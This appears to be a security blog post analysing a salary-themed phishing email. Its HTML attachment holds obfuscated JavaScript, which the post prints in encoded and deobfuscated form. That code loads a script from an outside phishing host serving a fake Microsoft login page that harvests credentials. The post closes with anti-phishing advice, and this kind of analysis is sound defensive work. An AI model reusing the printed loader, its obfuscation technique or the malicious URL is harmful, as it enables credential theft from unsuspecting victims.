Decomposing a common phishing attack

Generated with AI

According to CISA, 90% of successful cyber attacks start when you click an unfamiliar link or attachment. For those who are not familiar with what is Phishing: it is a type of social engineering attack in which malicious actors attempt to deceive individuals through deceptive emails, into revealing sensitive information, such as login credentials, personal information, financial details, etc. Most commonly this is done, but not limited to, sending victims links to fake websites or malicious attachments that appear to come from a legitimate and trusted source. Despite all the advances in security tooling and e-mail security, phishing is still the preferred choice to compromise users and companies. This is because tools only go so far and human is still regarded as the weakest link in an organization’s cyber security defenses. Recently we received an email with the following headers:

It had an attachment named “Axelspringer Salary Approval.html”. During these inflationary times we are living, this kind of name will surely trigger human curiosity and greed sensors to find out more. Could this be the long-awaited salary raise I have been waiting for?! Jokes aside, this is a prime example of social engineering techniques at work, manipulating recipients emotionally by tapping into their innate curiosity and greed (who wouldn’t want more money?) to induce an action beneficial to the attacker and lure the recipient into finding out more and opening the malicious attachment. Although not a very sophisticated example of phishing email (any attachment with .html extension should surely raise red flags for most of the users and the email address it is coming from is not even remotely lookalike to our HR email), it could very well work on some. After all, the attacker does not need to get every recipient to click on it, one will just do fine! It is a numbers game and all you need is that one window of opportunity to get in.

Proceeding with the analysis and decomposing the attack, the next step would be to check the source code of this HTML file. In this instance, I used Sublime Text to view the source code.

<script>
  document.write(decodeURIComponent("%t8+KHpV3t8+KHpVCt8+KHpVht8+KHpVtt8+KHpVmt8+KHpVlt8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpV%t8+KHpV3t8+KHpVCt8+KHpVit8+KHpVnt8+KHpVpt8+KHpVut8+KHpVtt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpVct8+K
  [redacted for readability]
  KHpVat8+KHpVyt8+KHpV%t8+KHpV3t8+KHpVAt8+KHpVnt8+KHpVot8+KHpVnt8+KHpVet8+KHpV%t8+KHpV3t8+KHpVBt8+KHpV%t8+KHpV2t8+KHpV2t8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpV%t8+KHpV3t8+KHpVCt8+KHpV/t8+KHpVst8+KHpVvt8+KHpVgt8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV3t8+KHpVCt8+KHpV/t8+KHpVht8+KHpVtt8+KHpVmt8+KHpVlt8+KHpV%t8+KHpV3t8+KHpVE".replaceAll("t8+KHpV","")))
</script>

The contents of this confirm that this is no normal HTML file. Only some odd-looking JavaScript. What does the javascript do? Simplifying this:

<script>document.write(decodeURIComponent("<stream of weird characters>".replaceAll("t8+KHpV","")))</script>

"<stream of weird characters>".replaceAll("t8+KHpV","") is searching for the exact sequence of characters "t8+KHpV" within the <stream of weird characters> string and removing all instances of it, effectively deleting that specific substring from the original string.

Then it proceeds with decodeURIComponent() the resulting string. The decodeURIComponent() method decodes a URI component. Finally document.write()writes the result of the decoding to the HTML document stream.

To check to see what this code evaluates to, I will use Mozilla developer tools but any code editor would do here. I will first execute the decodeURIComponent() in the browser developer tools console. Resulting code:

<html> <input class="QXsjbdsvxa" id="b64e" type="hidden" value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/> <svg onload="var _0x4b2851 = _0x2b2c;function _0x2b2c(_0x97d777, _0x995773) { var _0x1fae87 = _0x2921(); _0x2b2c = function (_0x4c0ce9, _0x47d132) { _0x4c0ce9 = _0x4c0ce9 - (-0x25a1 + 0x1b6b + 0xb50); var _0x109750 = _0x1fae87[_0x4c0ce9]; return _0x109750; }; return _0x2b2c(_0x97d777, _0x995773);}(function (_0x4053ff, _0xd1c398) { var _0x412f20 = _0x2b2c; var _0x445caa = _0x4053ff(); while (!![]) { try { var _0x2be3ff = -parseInt(_0x412f20(0x11d)) / (0x3 * 0x1e1 + 0xe6f * 0x1 + -0x1411) + -parseInt(_0x412f20(0x11e)) / (0x1 * -0x1c0f + -0x39 * -0x30 + 0x1161 * 0x1) + parseInt(_0x412f20(0x12a)) / (-0x74b + -0x11ba + 0x1908) * (parseInt(_0x412f20(0x122)) / (-0x3 * -0x476 + 0xb12 + 0x11 * -0x170)) + -parseInt(_0x412f20(0x128)) / (-0x20b1 * -0x1 + 0x1 * -0x2595 + 0x4e9) + parseInt(_0x412f20(0x126)) / (0x1067 + -0x2202 + 0x11a1) + parseInt(_0x412f20(0x121)) / (-0xe38 + 0xdf * -0x26 + 0x17 * 0x20f) * (parseInt(_0x412f20(0x123)) / (0x4 * -0x40 + 0x1 * 0xa7b + -0x973)) + -parseInt(_0x412f20(0x11b)) / (-0x162c * -0x1 + 0x64d * 0x5 + -0x35a4) * (-parseInt(_0x412f20(0x11f)) / (-0x2c7 + 0xf99 + -0x2 * 0x664)); if (_0x2be3ff === _0xd1c398) { break; } else { _0x445caa['push'](_0x445caa['shift']()); } } catch (_0x4b03c9) { _0x445caa['push'](_0x445caa['shift']()); } }}(_0x2921, 0x4e9d9 * 0x1 + 0x9297 + -0x1927e));var IcMQLg = window[_0x4b2851(0x124)];PBWeni = IcMQLg[_0x4b2851(0x127) + _0x4b2851(0x125)](_0x4b2851(0x120) + 'ipt');function _0x2921() { var _0x4fa708 = [ 'Element', '83640KvteCv', 'create', '1543835TnrKnB', 'setAttribu', '186FlXehs', 'body', '5995818QZIMGT', 'src', '487455MZsPAM', '460294AizzKb', '10tQlFMR', 'scr', '120799hQOmAP', '31092awlUZP', '56TaaOpb', 'document' ]; _0x2921 = function () { return _0x4fa708; }; return _0x2921();}PBWeni[_0x4b2851(0x129) + 'te'](_0x4b2851(0x11c), String.fromCharCode(104,116,116,112,115,58,47,47,116,104,101,97,109,97,116,101,117,114,109,97,110,100,111,108,105,110,105,115,116,46,99,111,109,47,111,114,105,108,101,98,105,103,109,105,108,108,121,104,117,110,47,104,111,115,116,50,50,47,97,100,109,105,110,47,106,115,47,109,115,46,112,104,112));document[_0x4b2851(0x11a)]['appendChil' + 'd'](PBWeni);" style="display:none;"> </svg></html>

This evaluates to a valid HTML which will be written to the HTML document. We can think of the resulting HTML as composed of two parts:

• The <input> element:

<input class="QXsjbdsvxa" id="b64e" type="hidden" value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/>

The <input> tag specifies an input field where the user can enter data. There is a very base64-like-looking string set as the input value.

% echo dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg== | base64 --decode
victimname@axelspringer.com

At this point, it is unclear why this is set as it is, perhaps mapping which recipient opened the attachment.

• The <svg> element:

<svg onload="<some odd non-readable javascript code>" style="display:none;"> </svg>

SVG is used to define graphics for the Web. One of its powerful but also dangerous capabilities is to include and run Javascript. In this case, after this HTML page has loaded, it will execute the obfuscated javascript. How do we make sense of this obfuscated Javascript? There is an array of deobfuscation tools out there that can hopefully make sense of this.

I pasted the obfuscated javascript here.

var IcMQLg = window.document
PBWeni = IcMQLg.createElement('script')
PBWeni.setAttribute(
    'src', String.fromCharCode(
        104, 116, 116, 112, 115, 58, 47, 47, 116, 104, 101, 97, 109, 97, 116, 101, 117, 114, 109, 97, 110, 100, 111, 108, 105, 110, 105, 115, 116, 46, 99, 111, 109, 47, 111, 114, 105, 108, 101, 98, 105, 103, 109, 105, 108, 108, 121, 104, 117, 110, 47, 104, 111, 115, 116, 50, 50, 47, 97, 100, 109, 105, 110, 47, 106, 115, 47, 109, 115, 46, 112, 104, 112
    )
)
document.body.appendChild(PBWeni)

This is now much more readable. This code is dynamically generating a URL by converting a series of character codes into their respective characters.

The resulting URL is:

<https://theamateurmandolinist.com/orilebigmillyhun/host22/admin/js/ms.php>

Checking the URL with BurpSuite shows that JavaScript is hosted there.

BurpSuite request and response

It will fetch content from this remote URL and run it in a Javascript context. Let’s see what this looks like in the browser!

This looks like a classical Microsoft domain login with the company styling. The apparent purpose of this phishing campaign is to harvest the login credentials of the victim to gain access to our company’s internal resources. Out of interest, I sent a dummy password to it to see if it validates the credentials. Apparently yes:

Most likely the remote host acts as a malicious proxy that forwards the credentials to Microsoft for verification. Different man-in-the-middle attack frameworks out there do just that, the most famous framework being EvilGinx.

Additionally, I like to use some Open Source Intelligence (OSINT) tools to check URL and domain reputation and get a better understanding of the attack. There are many tools out there but the most well-known is Virustotal. Virustotal flags the URL as malicious but not overwhelmingly:

For example, another common tool such as urlscan, a service that analyses websites by simulating regular user behavior, does not think the URL is malicious.

Nevertheless, it is a useful service to analyze such malicious URLs safely without executing any code on your host computer. Also, it provides a lot of additional information about the URL as you can see from the screenshot. Please exercise caution when sharing links with urlscan, as these will be publicly indexed and accessible to anyone who searches for them. Therefore, refrain from submitting any confidential company-originated links.

Stay vigilant

If you’ve worked in a corporate environment, chances are you’ve participated in some form of security awareness training focused on detecting phishing attacks. Therefore, I won’t delve into the exhaustive technical and educational measures organizations can take to safeguard against phishing attacks. Instead, I’ll highlight key principles to help you defend against most phishing attempts:

1. Exercise Patience: Take your time to review the emails you receive. Avoid rushing to click on links or open attachments.
2. Ask Critical Questions:

• Sender Verification: Who is the sender of the email? Is the sender’s email address familiar to me?
• Content Assessment: Does the email’s content align with what you’d expect from this sender? Does it make logical sense?
• Be Cautious of Requests: Does the email request sensitive actions like money transfers or sharing credentials?
• Attachments and Links: Does it prompt you to open attachments or click on links? Have you interacted with these links or attachments previously? Do attachments have unusual names or file extensions? When you hover your cursor over a link, does the URL seem legitimate and familiar?”

If you’ve rapidly pondered these questions, you’re likely to sense whether something appears legitimate or raises suspicions. Trust your instincts; if something feels amiss, always double-check the email using an alternate communication channel with the supposed sender, such as a phone call or a message on Slack. Alternatively, seek guidance from your IT department or colleagues in your office. Regrettably, sophisticated phishing campaigns orchestrated by experienced threat actors consider these precautions, making it occasionally challenging to detect phishing emails. If, however, you do inadvertently engage with one, promptly inform both your IT department and your supervisor. Hopefully, your organization has effective security measures in place to swiftly address security incidents. It’s important to remember that everyone, including security professionals, can fall victim to a phishing attack.